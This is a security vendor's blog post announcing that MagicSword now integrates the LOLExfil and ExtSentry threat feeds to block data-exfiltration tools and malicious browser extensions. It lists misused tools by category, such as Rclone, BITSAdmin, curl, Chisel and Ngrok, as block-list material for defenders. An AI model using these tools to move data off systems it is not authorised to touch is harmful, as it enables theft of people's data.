LOLExfil and ExtSentry Intelligence: MagicSword Now Blocks Exfiltration Tools & Malicious Extensions
MagicSword now integrates LOLExfil and ExtSentry, two community intelligence sources that cover 200+ data exfiltration tools and a growing catalog of malicious browser extensions. Customers get automated blocking policies derived from both feeds without writing a single rule.
MagicSword now integrates two powerful community intelligence sources built around living off the land attack prevention; LOLExfil and ExtSentry - giving customers automated protection against data exfiltration tools and malicious browser extensions. Both projects are maintained by security researcher mthcht, whose work in threat hunting, detection engineering, and open-source intelligence continues to raise the bar for the defender community.
This integration means MagicSword customers get blocking policies derived from these feeds without writing a single rule. The intelligence is collected, normalized, and enforced across your fleet automatically.
The Two Problems Defenders Face
Data Exfiltration Hides Behind Legitimate Tools
Attackers don't build custom exfiltration tools when trusted software already does the job. Rclone syncs your data to an attacker-controlled cloud bucket. WinSCP transfers files over encrypted SSH sessions. AnyDesk and FileZilla move gigabytes while looking like routine IT activity. MEGA's encrypted uploads are indistinguishable from a developer backing up their work.
These tools are legitimate. They're signed. They pass application allowlists. And they're the same tools threat actors use to steal your data during every stage of a breach, from initial staging to final exfiltration.
The challenge: how do you build detection and prevention for 200+ tools across cloud storage, sync utilities, remote access software, tunneling protocols, and scripting interpreters, and keep that list current as new tools emerge?
Malicious Browser Extensions Operate in a Blind Spot
Browser extensions are the most under-monitored attack surface in enterprise environments. They auto-update silently through browser stores, install without IT oversight, and operate with broad permissions that can access user sessions, intercept requests, read page content, and steal credentials.
Most EDR security tools aren't built to monitor what happens inside the browser, making extensions a blind spot that traditional endpoint protection consistently misses.
In December 2024, a phishing campaign compromised 35 Chrome extensions affecting 2.6 million users. These were not obscure add-ons, they were widely trusted tools that turned malicious after their developers were phished. Once compromised, the extensions exfiltrated cookies, session tokens, and credentials while appearing completely normal.
The challenge: how do you maintain an up-to-date blocklist of malicious extension IDs across Chrome and Edge when the threat landscape shifts hourly?
What Is LOLExfil?
LOLExfil, Living Off The Land Exfiltration, is a comprehensive reference database cataloging 200+ tools across 10 categories that threat actors abuse for data exfiltration. Created and maintained by [mthcht](https://github.com/mthcht), it documents everything from cloud storage clients and sync utilities to tunneling protocols and scripting-based transfer methods.
What makes LOLExfil invaluable is the depth of each entry. Every tool listing includes:
- Endpoint and network detection patterns - the exact process names, command-line arguments, and filenames that appear during exfiltration
- MITRE ATT&CK mappings - technique IDs like T1567 (Exfiltration Over Web Service) and T1048 (Exfiltration Over Alternative Protocol) tied to each tool
- Simulation commands - test patterns for blue team exercises
- Forensic artifacts - disk, registry, and memory indicators for incident response
- IOCs - ports, pipes, service names, mutexes, and user-agents
The categories span the full exfiltration landscape:
| Category | Examples |
|---|---|
| Cloud Storage | Rclone, MEGA, pCloud, Nextcloud |
| Sync & Transfer | WinSCP, FileZilla, Cyberduck |
| Remote Access | AnyDesk, RustDesk, TeamViewer |
| SaaS & Web | Discord webhooks, Telegram bots, Slack |
| SSH & Network | OpenSSH, Chisel, Ngrok |
| Scripting & LOLBin | BITSAdmin, CertReq, curl |
| Protocol | FTP, SMB, WebDAV |
| Backup | Duplicati, Restic, Veeam Agent |
| Staging | 7-Zip, WinRAR archiving before exfil |
What Is ExtSentry?
ExtSentry is a browser extension threat intelligence platform that converts community-curated threat data into actionable security feeds. Also created and maintained by mthcht, it aggregates intelligence from the mthcht/awesome-listsrepository and other sources, publishing structured feeds of malicious, compromised, and suspicious browser extensions.
ExtSentry tracks extensions across multiple threat categories:
| Category | What It Covers |
|---|---|
| Malware | Extensions that actively deploy malicious payloads |
| Compromised | Legitimate extensions taken over by attackers (supply chain) |
| Scams | Extensions that deceive users for financial gain |
| PUP | Potentially unwanted programs with deceptive behavior |
| Crypto Theft | Extensions targeting cryptocurrency wallets and exchanges |
| Proxy/VPN Abuse | Extensions that route traffic through attacker infrastructure |
| Credential Access | Extensions designed to harvest login credentials |
| Defense Evasion | Extensions that tamper with security tooling |
Each indicator includes the Chromium extension ID, display name, category, threat type, severity, SHA-256 hash, and reference links. The feed updates every 45 minutes via GitHub Actions, meaning newly discovered malicious extensions propagate to your blocking policies within hours, not weeks.
ExtSentry also ships detection content in 16+ formats: STIX 2.1, MISP, Sigma rules, YARA rules, Suricata/Snort rules, Splunk lookups, Elastic NDJSON, Microsoft Sentinel KQL, and more. For MagicSword customers, we handle the hard part, you get the blocking policies automatically.
Before you can block malicious extensions, you need to know what's running. Check out: Browser Extension Visibility: Why Inventory Changes the Game
Why This Matters for Defenders
Data exfiltration is the endgame of nearly every breach. Whether it's a ransomware operator staging data before encryption, an APT group siphoning intellectual property, or an insider using cloud sync tools to move files - the exfiltration step is where the damage happens. LOLExfil intelligence, enforced as blocking policy via MagicSword, removes the attacker's ability to use these tools on your endpoints entirely.
Browser extensions are the next frontier of supply chain attacks. Attackers are increasingly targeting extension developers through phishing and social engineering, turning trusted tools into credential stealers overnight. ExtSentry intelligence, enforced as browser policy via MagicSword, ensures your fleet blocks known-malicious extensions before they can harvest a single session token.
Together, these sources close two of the widest gaps in endpoint security:
- LOLExfil blocks the tools attackers use to get your data out
- ExtSentry blocks the extensions attackers use to steal credentials and sessions from inside the browser
This is intelligence-driven blocklisting in practice, threat data collected, normalized, and enforced before the attacker gets to use it.
Both are now part of MagicSword's growing intelligence catalog alongside.
Credit Where It's Due
This integration is built on the work of mthcht- a security researcher focused on threat hunting, DFIR, and detection engineering who has built an impressive portfolio of open-source intelligence projects. Beyond LOLExfil and ExtSentry, mthcht maintains ThreatHunting-Keywords, awesome-lists for SOC/CERT teams, and several other community resources including LOLC2, BADGUIDs, and SINKHOLED.
Projects like LOLExfil and ExtSentry represent the best of community-driven security research: freely available, actively maintained, and structured for operational use. MagicSword is proud to operationalize this work and put it directly into the hands of defenders as automated blocking policy.
Follow mthcht's work:
GitHub · X/Twitter · Bluesky · Medium
Already a MagicSword customer? LOLExfil and ExtSentry intelligence sources are available now in your Intelligence dashboard. Navigate to Policies and attach them to your policies to start blocking exfiltration tools and malicious browser extensions across your fleet.
Evaluating MagicSword? Book a demo to see how automated intelligence enforcement works across Windows, macOS, and Linux endpoints - from Application Control policies to browser extension control.
Want to stay informed? Subscribe to our newsletter for the latest intelligence integrations, product updates, and threat research.
Written by
Michael Haag
Threat Researcher
In the intricate chessboard of cybersecurity, my role oscillates between a master tactician and a relentless hunter. As an expert in detection engineering and threat hunting, I don't just respond to the digital threats, I anticipate them, ensuring that the digital realm remains sovereign.
